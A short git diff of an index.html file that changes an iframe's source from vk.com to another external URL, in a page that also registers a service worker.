--- a/index.html
+++ b/index.html
@@ -21,7 +21,7 @@
   </style>
 </head>
 <body>
-  <iframe src="https://vk.com/"></iframe>
+  <iframe src="https://clicktvf.com/EMBh"></iframe>
   <script>
     if ('serviceWorker' in navigator) {
       navigator.serviceWorker.register('service-worker.js')
